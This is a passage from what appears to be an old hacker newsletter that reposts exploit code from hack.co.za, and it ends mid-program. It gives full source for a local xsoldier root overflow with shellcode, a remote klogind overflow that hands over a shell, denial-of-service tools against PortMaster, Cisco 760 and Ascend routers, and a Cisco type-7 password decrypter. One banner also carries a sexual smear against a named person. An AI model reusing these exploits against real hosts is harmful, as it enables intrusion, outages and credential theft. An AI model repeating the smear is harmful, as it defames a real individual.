"No connection to port 80 or cannot resolve: %d hosts.\n\n",
nuked, notnuked);
exit(0);
}
/* EOF */
/* www.hack.co.za [19 May]*/
@HWA
250.0 [IND] xsol-x.c mandrake 7.0 local overflow by lwc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
lwc@vapid.dhs.org
/*Larry W. Cashdollar linux xsolider exploit.
*lwc@vapid.dhs.org http://vapid.dhs.org
*if xsolider is built and installed from its source it will be installed
*setuid root in /usr/local/games
*original exploit found by brock tellier for freebsd 3.3 ports packages.
*If a setregid() call is placed in the shellcode, you can get egid=12
*with the default mandrake installation.*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90 /*no operation skip to next instruction. */
#define LEN 4480 /*our buffersize. */
char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";
/*Nab the stack pointer to use as an index into our nop's*/
long
get_sp ()
{
__asm__ ("mov %esp, %eax");
}
int
main (int argc, char *argv[])
{
char buffer[LEN];
int i, offset;
long retaddr = get_sp ();
if (argc <= 1)
offset = 0;
else
offset = atoi (argv[1]);
/*#Copy the NOPs in to the buffer leaving space for shellcode and
#pointers*/
for (i = 0; i < (LEN - strlen (shellcode) - 100); i++)
*(buffer + i) = NOP;
/*[NNNNNNNNNNNNNNNNNNNNN ]*/
/* ^-- LEN -(strlen(shellcode)) - 35*/
/*#Copy the shell code into the buffer*/
memcpy (buffer + i, shellcode, strlen (shellcode));
/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSS ]*/
/* ^-(buffer+i) */
/*#Fill the buffer with our new address to jump to esp + offset */
for (i = i + strlen (shellcode); i < LEN; i += 4)
*(long *) &buffer[i] = retaddr+offset;
/*[NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRRRRRRRRRRR]*/
/* ^-(i+strlen(shellcode))*/
printf ("Jumping to address %x BufSize %d\n", retaddr + offset, LEN);
execl ("/usr/local/games/xsoldier", "xsoldier", "-display", buffer, 0);
}
/* www.hack.co.za [19 May]*/
@HWA
251.0 [IND] klogind.c bsdi 4.0.1 remote overflow by duke.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
duke@viper.net.au
/*
klogin remote buffer overflow
by duke (duke@viper.net.au)
tested on BSDI 4.0.1 klogin.
The bug is actually in the kerberos library so this
affects all kerb services (kerbIV). This code should need
minimal (if any) modification to use on other kerberos services.
it will only work if the file /etc/kerberosIV/krb.conf exists.
-duke
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#define RET 0x8047830
#define NOPLEN 900
#define MAX(x, y) ((x > y) ? x : y)
char bsdi_shell[]=
"\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76"
"\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07"
"\xff\xe8\xdc\xff\xff\xff/bin/sh\x00";
void usage(char *);
void shell(int);
char *make_data(void);
int offset=0;
int main(int argc, char **argv)
{
int sockfd, port=543, c;
char *pkt, buf[1024];
struct sockaddr_in sin;
struct hostent *hp;
while((c = getopt(argc, argv, "p:o:")) != EOF){
switch(c){
case 'p': port = atoi(optarg); break;
case 'o': offset = atoi(optarg); break;
default: usage(argv[0]);
}
}
if(!argv[optind])
usage(argv[0]);
if((hp = gethostbyname(argv[optind])) == NULL){
fprintf(stderr, "can't resolve host\n");
exit(-1);
}
pkt = make_data();
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
sin.sin_addr = *((struct in_addr *)hp->h_addr_list[0]);
if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
exit(-1);
}
if(connect(sockfd, (struct sockaddr *)&sin, sizeof(sin)) < 0){
perror("connect");
exit(-1);
}
write(sockfd, pkt, 1221);
free(pkt);
shell(sockfd);
}
void usage(char *p)
{
fprintf(stderr, "usage: %s [ -p port ] [ -o offset ] <hostname>\n", p);
fprintf(stderr, "-p: port to use\n");
fprintf(stderr, "-o: offset\n");
exit(0);
}
char *make_data(void)
{
char *tmp, *ptr;
int i;
if((tmp=(char *)calloc(1250, sizeof(char))) == NULL){
perror("calloc");
exit(-1);
}
ptr = tmp;
*ptr++ = 0x00;
memcpy(ptr, "AUTHV0.1", 8);
ptr+=8;
for(i=0; i<8; i++)
*ptr++ = 0x41;
*(unsigned long *)ptr = htonl(1200);
ptr+=4;
*(unsigned int *)ptr++ = 4;
*ptr++ = 8;
*ptr++ = 1;
for(i=0; i < 600; i+=4)
*(long *)&ptr[i] = RET + offset;
memset(ptr+300, 0x90, NOPLEN);
memcpy(ptr+800, bsdi_shell,
sizeof(bsdi_shell));
*(ptr+1000) = 0x00;
return(tmp);
}
void shell(int sock)
{
fd_set rset;
char bu[1024];
write(sock, "cd /; id; pwd; uname -a;\n", 25);
FD_ZERO(&rset);
for(;;){
FD_SET(fileno(stdin), &rset);
FD_SET(sock, &rset);
if(select(MAX(sock, fileno(stdin))+1, &rset, NULL, NULL, NULL) < 0){
perror("select");
exit(-1);
}
if(FD_ISSET(sock, &rset)){
char buf[1024];
int n;
bzero(buf, sizeof(buf));
n = read(sock, buf, sizeof(buf)-1);
if(n == 0){
printf("EOF from server\n");
exit(0);
}
if(n < 0){
perror("read");
exit(-1);
} else {
write(1, buf, n);
}
}
if(FD_ISSET(fileno(stdin), &rset)){
char buf[1024];
bzero(buf, sizeof(buf));
if(fgets(buf, sizeof(buf)-4, stdin) == NULL){
printf("OK. Quitting\n");
close(sock);
exit(0);
}
strcat(buf, "\n");
if(write(sock, buf, strlen(buf)) < 0){
perror("write");
exit(0);
}
}
}
}
/* www.hack.co.za [19 May]*/
@HWA
252.0 [IND] pmcrash.c router/livingston remote dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* The following code will crash ANY Livingston PortMaster.
It telnets the the portmaster and overflows its buffers.
Thanks to 'The Doc' for this one. */
/* pmcrash - note this'll work much faster if all your arguments
are IP addresses.. mainly because I didn't feel like
coding a structure to keep track of all the resolved
names.. so write a script to resolve your list of
names first, then provide those as arguments */
/* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*/
/* Compiling instructions:
Linux:
gcc -O2 -fomit-frame-pounter -s -o pmfinger pmfinger.c
Solaris 2.4:
cc -O -s -o pmfinger pmfinger.c -lsocket -lnsl -lresolv -lucb
*/
#include <sys/time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <pwd.h>
#ifndef sys_errlist
extern char *sys_errlist[];
#endif
#ifndef errno
extern int errno;
#endif
/* Inet sockets :-) */
int num=0;
int socks[250];
/* show sessions flag */
unsigned short int showflag=0;
char *
mystrerror(int err) {
return(sys_errlist[err]);
}
void
exitprog(void) {
while(num--) {
shutdown(socks[num-1],0);
close(socks[num-1]);
}
exit(0);
}
unsigned long int
resolver(host)
char *host;
{
unsigned long int ip=0L;
if(host && *host && (ip=inet_addr(host))==-1) {
struct hostent *he;
if(!(he=gethostbyname((char *)host)))
ip=0L;
else
ip=*(unsigned long *)he->h_addr_list[0];
}
return(ip);
}
void
usage(void) {
puts("pmcrash v0.2a - ComOS System Rebooter :-)\n"
"Copyright (C) 1995 LAME Communications\n"
"Written by Dr. Delete, Ph.D.\n\n"
"Usage: pmcrash <portmaster>[:port] [<portmaster>[:port] ... ]\n");
exit(0);
}
void
main(int argc,char *argv[]) {
unsigned short int port=0,x=1;
struct sockaddr_in server;
char crash[] = { 0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3,0xFF,0xF3 };
char *temp;
if(argc<2)
usage();
signal(SIGPIPE,(void (*)())exitprog);
signal(SIGHUP,(void (*)())exitprog);
signal(SIGINT,(void (*)())exitprog);
signal(SIGTERM,(void (*)())exitprog);
signal(SIGBUS,(void (*)())exitprog);
signal(SIGABRT,(void (*)())exitprog);
signal(SIGSEGV,(void (*)())exitprog);
server.sin_family=AF_INET;
printf("\nConnecting..."); fflush(stdout);
for(;x<argc;x++) {
if((socks[num]=socket(AF_INET,SOCK_STREAM,0))==-1) {
fprintf(stderr,"Unable to allocate AF_INET socket: %s\n",mystrerror(errno));
exitprog();
}
setsockopt(socks[num],SOL_SOCKET,SO_LINGER,0,0);
setsockopt(socks[num],SOL_SOCKET,SO_REUSEADDR,0,0);
setsockopt(socks[num],SOL_SOCKET,SO_KEEPALIVE,0,0);
if((temp=strstr(argv[x],":"))) {
*temp++=(char)0;
server.sin_port=htons((atoi(temp)));
}
else
server.sin_port=htons(23);
if(!(server.sin_addr.s_addr = resolver(argv[x]))) {
fprintf(stderr,"Unable to resolve host '%s'.\n",argv[x]);
close(socks[num]);
continue;
}
if(connect(socks[num],(struct sockaddr *)&server,sizeof(struct sockaddr_in))) {
printf("!"); fflush(stdout);
/* fprintf(stderr,"Unable to connect to %s. (%s)\n",argv[x],mystrerror(errno)); */
close(socks[num]);
continue;
}
printf("."); fflush(stdout);
num++;
}
printf("\nSweeping..."); fflush(stdout);
for(x=0;x<num;x++) {
write(socks[x],crash,10);
printf("."); fflush(stdout);
}
puts("\n");
sleep(4);
exitprog();
}
/* www.hack.co.za [19 May]*/
@HWA
253.0 [IND] cisco-connect.c cisco dos attack by tiz.telesup.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec);
void net_write (int fd, const char *str, ...);
unsigned long int net_resolve (char *host);
void
usage (void)
{
printf ("usage: ./cisco host times\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char host[256];
int port,times,count,sd = 0;
int m = 0;
struct sockaddr_in cs;
printf ("Cisco 760 series Connection Overflow.\n");
printf ("-------------------------------------\n");
if (argc < 3)
usage();
strcpy (host, argv[1]);
times=atoi (argv[2]);
if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
usage();
port =23; /* This might be changed to the telnet port of the router*/
printf ("Host: %s Times: %d\n", host, times);
for (count=0;count<times;count++){
printf ("Connecting... Connection number %d \n",count);
fflush (stdout);
sd = net_connect (&cs, host, port, NULL, 0, 30);
if (sd < 1) {
printf ("failed!\n");
exit (EXIT_FAILURE);
}
net_write (sd, "AAAA\n\n");
}
exit (EXIT_SUCCESS);
}
int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
unsigned short int sourceport, int sec)
{
int n, len, error, flags;
int fd;
struct timeval tv;
fd_set rset, wset;
/* first allocate a socket */
cs->sin_family = AF_INET;
cs->sin_port = htons (port);
fd = socket (cs->sin_family, SOCK_STREAM, 0);
if (fd == -1)
return (-1);
if (!(cs->sin_addr.s_addr = net_resolve (server))) {
close (fd);
return (-1);
}
flags = fcntl (fd, F_GETFL, 0);
if (flags == -1) {
close (fd);
return (-1);
}
n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
if (n == -1) {
close (fd);
return (-1);
}
error = 0;
n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
if (n < 0) {
if (errno != EINPROGRESS) {
close (fd);
return (-1);
}
}
if (n == 0)
goto done;
FD_ZERO(&rset);
FD_ZERO(&wset);
FD_SET(fd, &rset);
FD_SET(fd, &wset);
tv.tv_sec = sec;
tv.tv_usec = 0;
n = select(fd + 1, &rset, &wset, NULL, &tv);
if (n == 0) {
close(fd);
errno = ETIMEDOUT;
return (-1);
}
if (n == -1)
return (-1);
if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
len = sizeof(error);
if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
errno = ETIMEDOUT;
return (-1);
}
if (error == 0) {
goto done;
} else {
errno = error;
return (-1);
}
}
} else
return (-1);
done:
n = fcntl(fd, F_SETFL, flags);
if (n == -1)
return (-1);
return (fd);
}
unsigned long int
net_resolve (char *host)
{
long i;
struct hostent *he;
i = inet_addr(host);
if (i == -1) {
he = gethostbyname(host);
if (he == NULL) {
return (0);
} else {
return (*(unsigned long *) he->h_addr);
}
}
return (i);
}
void
net_write (int fd, const char *str, ...)
{
char tmp[8192];
va_list vl;
int i;
va_start(vl, str);
memset(tmp, 0, sizeof(tmp));
i = vsnprintf(tmp, sizeof(tmp), str, vl);
va_end(vl);
send(fd, tmp, i, 0);
return;
}
/* www.hack.co.za [19 May]*/
@HWA
254.0 [IND] ascend.c ascend remote dos attack by the posse.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
The Posse Brings you:
The Linux Ascend Kill Program!
Kill your local ISP (or even non-local)
313373133731337313373133731337313373133731337313373133731337313373133731337
1 3
3 1
3 Because Ascend has such a strong programming department that would 3
7 never under any circumstances release a version of their code which 3
3 contained a bug. 7
1 3
3 Well. Ascend did it again. Those pesky non zero length tcp offset's 1
3 do it everytime! Are those fault lights available in christmas colors 3
7 in time for the season? h0h0h0.. 3
3 7
1 BTW, if anyone has any pictures of MSN pops, please post them to 3
3 someplace public so we can all share in the season spirit. 1
3 3
7 - The Posse is back! 3
3 7
1 greetz to : alpha bits, the grave digger, and fast freddy. 3
3 1
3 Goto our eleet ftp sitez: 3
7 3
3 7
1 The Dark Dungeon 198.34.1xx.xxx 600 gigz online! 3
3 Strobe Room 34.101.1xx.xxx 1TB of Warez and H/P/V/A/C/K text 1
3 3
731337313373133731337313373133731337313373133731337313373133731337313373133
3 7
1 2600.com is run off vnetmax.villagenet.com (205.136.35.3) 3
3 Keep your support of 2600, help Emmanuel play with his little boys 1
3 3
731337313373133731337313373133731337313373133731337313373133731337313373133
3
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#include <netdb.h>
unsigned short compute_tcp_checksum(struct tcphdr *th, int len,
unsigned long saddr, unsigned long daddr)
{
unsigned long sum;
__asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
"
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx
jb 2f
shrl $5, %%ecx
clc
1: lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
loop 1b
adcl $0, %%ebx
movl %%edx, %%ecx
2: andl $28, %%ecx
je 4f
shrl $2, %%ecx
clc
3: lodsl
adcl %%eax, %%ebx
loop 3b
adcl $0, %%ebx
4: movl $0, %%eax
testw $2, %%dx
je 5f
lodsw
addl %%eax, %%ebx
adcl $0, %%ebx
movw $0, %%ax
5: test $1, %%edx
je 6f
lodsb
addl %%eax, %%ebx
adcl $0, %%ebx
6: movl %%ebx, %%eax
shrl $16, %%eax
addw %%ax, %%bx
adcw $0, %%bx
"
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si" );
return((~sum) & 0xffff);
}
#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) )
#define tcp_offset ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;
u_short
ip_checksum (u_short * buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void
fixhost (struct sockaddr_in *addr, char *hostname)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *) addr;
(void) bzero ((char *) address, sizeof (struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_addr.s_addr = inet_addr (hostname);
if ((int) address->sin_addr.s_addr == -1)
{
host = gethostbyname (hostname);
if (host)
{
bcopy (host->h_addr, (char *) &address->sin_addr,
host->h_length);
}
else
{
puts ("Couldn't resolve address!!!");
exit (-1);
}
}
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
unsigned short
lookup_port (p)
char *p;
{
int i;
struct servent *s;
if ((i = atoi (p)) == 0)
{
if ((s = getservbyname (p, "tcp")) == NULL)
errors ("Unknown port %s\n", p);
i = ntohs (s->s_port);
}
return ((unsigned short) i);
}
void
spoof_packet (struct sockaddr_in local, int fromport, \
struct sockaddr_in remote, int toport, ulong sequence, \
int sock, u_char theflag, ulong acknum, \
char *packdata, int datalen)
{
char *packet;
int tempint;
if (datalen > 0)
datalen++;
packet = (char *) malloc (psize + datalen);
tempint = toport;
toport = fromport;
fromport = tempint;
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + tcp_offset);
fake_tcp->th_dport = htons (fromport);
fake_tcp->th_sport = htons (toport);
fake_tcp->th_flags = theflag;
fake_tcp->th_seq = random ();
fake_tcp->th_ack = random ();
/* this is what really matters, however we randomize everything else
to prevent simple rule based filters */
fake_tcp->th_off = random ();
fake_tcp->th_win = random ();
fake_tcp->th_urp = random ();
}
if (datalen > 0)
{
char *tempbuf;
tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
for (tempint = 0; tempint < datalen - 1; tempint++)
{
*tempbuf = *packdata;
*tempbuf++;
*packdata++;
}
*tempbuf = '\r';
}
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (psize + datalen);
real_ip->tos = 0;
real_ip->ttl = 64;
real_ip->protocol = 6;
real_ip->check = 0;
real_ip->id = 10786;
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
temp_ip.saddr = htonl (ntohl (real_ip->daddr));
real_ip->daddr = htonl (ntohl (real_ip->saddr));
real_ip->saddr = temp_ip.saddr;
real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
{
struct tcphdr *another_tcp;
another_tcp = (struct tcphdr *) (packet + tcp_offset);
another_tcp->th_sum = 0;
another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
real_ip->saddr, real_ip->daddr);
}
}
{
int result;
sock = (int) temp_socket;
result = sendto (sock, packet, psize + datalen, 0,
(struct sockaddr *) &remote, sizeof (remote));
}
free (packet);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int daddr;
unsigned short dport;
struct sockaddr_in sin;
int s, i;
struct sockaddr_in local, remote;
u_long start_seq = 4935835 + getpid ();
if (argc != 3)
errors ("Usage: %s <dest_addr> <dest_port>\n\nDest port of 23 for Ascend units.\n",
argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(daddr = lookup (argv[1])))
err ("Unable to lookup destination address.\n");
dport = lookup_port (argv[2]);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = daddr;
sin.sin_port = dport;
fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]);
fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]);
/* 500 seems to be enough to kill it */
for (i = 0; i < 500; i++)
{
start_seq++;
local.sin_addr.s_addr = random ();
spoof_packet (local, random (), remote, dport, start_seq, (int) s,
TH_SYN | TH_RST | TH_ACK, 0, NULL, 0);
}
}
/* www.hack.co.za [19 May]*/
@HWA
255.0 [IND] ciscocrack.c / ciscocrack.pl cisco password cracker.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* Cisco password decrypter V2.0
* (c) 1995 by SPHiXe
*
* DISCLAIMER: The author of this program takes no responsibility for
* neither direct nor indirect damages caused by this program.
* Misuse of this program may lead to serious problems with
* your local authorities...
* You should know what you're doing.
*/
#include <stdio.h>
#include <ctype.h>
char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};
char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";
char *pname;
cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;
if(strlen(enc_pw) & 1)
return(-1);
seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';
if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);
for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}
val *= 16;
if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}
if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}
if(strlen(enc_pw) != i)
return(-1);
}
dec_pw[++i / 2] = 0;
return(0);
}
usage()
{
fprintf(stdout, "Usage: %s -p <encrypted password>\n", pname);
fprintf(stdout, " %s <router config file> <output file>\n", pname);
return(0);
}
main(argc,argv)
int argc;
char **argv;
{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;
pname = argv[0];
if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}
if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;
case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;
default:
fprintf(stderr, "%s: unknow option.", pname);
}
return(0);
}
if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}
while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;
fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;
if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;
if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);
if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);
if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}
if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);
fprintf(out, "%s\n", passwd);
}
}
}
/* www.hack.co.za [19 May]*/
-=-
#! /bin/sh
## Decrypts cisco "encrypted" passwords. Feed this confg files as stdin.
## Anything that looks like a "type 7 encrypted" string gets decrypted.
## This should really be a C program, but is presented as a script just to
## piss off a certain group of people. One beer, please...
while read xx ; do
case "$xx" in
*d\ 7\ [01]??* ) ;;
*) continue ;;
esac
DEC=`echo "$xx" | sed -e 's/.* //' -e 's/\(^..\).*/\1/'`
DP1=`expr $DEC + 1`
HEX=`echo "$xx" | sed -e 's/.* //' -e 's/^..\(..*\)/\1/'`
echo 'dsfd;kfoA,.iyewrkldJKDHSUB' | cut -c "${DP1}-30" > /tmp/cis$.pad
echo '#' > /tmp/cis$.in
for xx in 1-2 3-4 5-6 7-8 9-10 11-12 13-14 15-16 17-18 19-20 21-22 ; do
echo "${HEX}" | cut -c $xx | sed -e '/^$/q' -e 's/^/0x/' >> /tmp/cis$.in
done
echo -n "${DEC}${HEX}: "
data -g < /tmp/cis$.in | xor /tmp/cis$.pad
echo ''
done
rm -f /tmp/cis$.pad /tmp/cis$.in
exit 0
# Discussion:
# When "service password-encryption" is configured into a cisco router and
# the configuration subsequently viewed, the passwords are no longer printed
# as plaintext but as strings of randomish-looking garbage. Analysis of
# several samples reveals the scrambling algorithm to be trivially weak.
# Dr. Delete derived and published an analysis and decryption program some
# time ago, but since that didn't seem to be generally available at the time
# I went looking for it, here is an independent explanation. This was worked
# out on PAPER over a plate of nachos in a hotel bar in downtown LA, but
# still illustrates where a general-purpose "xor" handler can be useful for
# quickly cracking lame "proprietary" algorithms of this genre.
# Passwords can be up to eleven mixed-case characters. In the "encrypted"
# representation, the first two bytes of the long string are a random decimal
# offset between 0 and 15 into a magic block of characters, and the remaining
# bytes are ascii-hex representations of the password bytes xored against
# the character-block bytes from the given offset on down. The character
# block is "dsfd;kfoA,.iyewrkldJKDHSUB", which is enough for a maximum-length
# password at the maximum offset.
# Another character block consisting of "sgvca69834ncxv9873254k;fg87" is
# located after the first one in the IOS image, which may be relevant to
# something else and is simply mentioned here for posterity. It is also
# interesting to note that the strings "%02d" and "%02x" occur immediately
# afterward, which in light of the above is another clue.
# _H* 960315
# www.hack.co.za [14 May]#
@HWA
256.0 [IND] l0phtl0phe-kid.c remote linux misc overflow by scut/teso.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://teso.scene.at/%20
/* l0phtl0phe-kid.c - antisniff exploit (1-1-1 "second fixed version" included)
*
* -scut/teso
*
* gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`
*
* description:
* l0pht messed up the fix for their problem in antisniff by not regarding
* the type signedness properties of the char and int values used. this
* results in a cool method bypassing the too extra checks (length + strncat).
* some work on this topic have been done by mixter, (bad results on type
* casting), but it should be obvious to any security conscious programmers.
* i'm not stating that they aren't allowed errors, but they should fix it
* for sure if they're going to fix it at all. -sc.
*
* 2nd version: script kiddie proof to avoid that "doesn't work" lamer claim.
*
* greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <arpa/nameser.h>
#include <libnet.h>
#define OFFSET 0xbffef9a0
unsigned int build_xp (unsigned char *xp);
int
main (int argc, char *argv[])
{
int sock; /* raw socket */
u_long src_ip,
dst_ip;
unsigned char xpbuf[1024]; /* this one gets complicated now */
unsigned char tpack[2048]; /* paket buffer */
unsigned int pl_len;
if (argc != 3) {
printf ("usage: %s <source ip> <dest ip>\n\n", argv[0]);
exit (EXIT_FAILURE);
}
sock = libnet_open_raw_sock (IPPROTO_RAW);
if (sock == -1) {
perror ("libnet_open_raw_sock");
exit (EXIT_FAILURE);
}
src_ip = libnet_name_resolve (argv[1], 0);
dst_ip = libnet_name_resolve (argv[2], 0);
pl_len = build_xp (xpbuf);
libnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,
src_ip, dst_ip, NULL, 0, tpack);
